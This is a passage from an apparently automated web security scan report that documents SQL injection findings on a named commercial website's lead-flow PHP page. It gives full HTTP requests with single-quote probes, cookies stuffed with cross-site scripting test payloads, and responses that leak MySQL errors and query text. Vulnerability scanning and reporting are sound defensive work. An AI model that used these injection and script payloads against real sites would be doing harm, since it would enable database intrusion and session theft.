Date: Mon, 14 Mar 2011 06:36:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6octl09cd8a62jmqqdlch3s3o4; path=/
Content-Length: 2494
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
adflow/incn00'/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3' OR prj.project_page_url = 'leadflow/incn00'/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=110006&group=incn00&template=3' OR prj.project_page_url = 'leadflow/incn0' at line 5

Request 2

GET /ppc/leadflow/incn00''/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:36:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=tjb2rnv7stckfqr2i9mgd8kjf2; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/incn00''/project_dynamic_page_updated.php was not found on this server.</p>

1.423. http://www.insideup.com/ppc/leadflow/incn00/project_dynamic_page_updated.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project_dynamic_page_updated.php'?catId=110006&group=incn00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:36:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=c4r0labnf6usukmrtoh0uggbh2; path=/
Content-Length: 2494
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
adflow/incn00/project_dynamic_page_updated.php'?catId=110006&group=incn00&template=3' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php'?catId=110006&group=incn00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=110006&group=incn00&template=3' OR prj.project_page_url = 'leadflow/incn0' at line 5

Request 2

GET /ppc/leadflow/incn00/project_dynamic_page_updated.php''?catId=110006&group=incn00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:36:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=dcdn2i0hdto7ii96ir7ivfdir6; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/incn00/project_dynamic_page_updated.php'' was not found on this server.</p>

1.424. http://www.insideup.com/ppc/leadflow/incn00/project_dynamic_page_updated.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project_dynamic_page_updated.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project_dynamic_page_updated.php?catId=110006'&group=incn00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:31:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=s7b9ikmjrkujnttgaq52aje3h6; path=/
Content-Length: 2494
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
adflow/incn00/project_dynamic_page_updated.php?catId=110006'&group=incn00&template=3' OR prj.project_page_url = 'leadflow/incn00/project_dynamic_page_updated.php?catId=110006'&group=incn00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=incn00&template=3' OR prj.project_page_url = 'leadflow/incn00/project_dyna' at line 5

Request 2

GET /ppc/leadflow/incn00/project_dynamic_page_updated.php?catId=110006''&group=incn00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
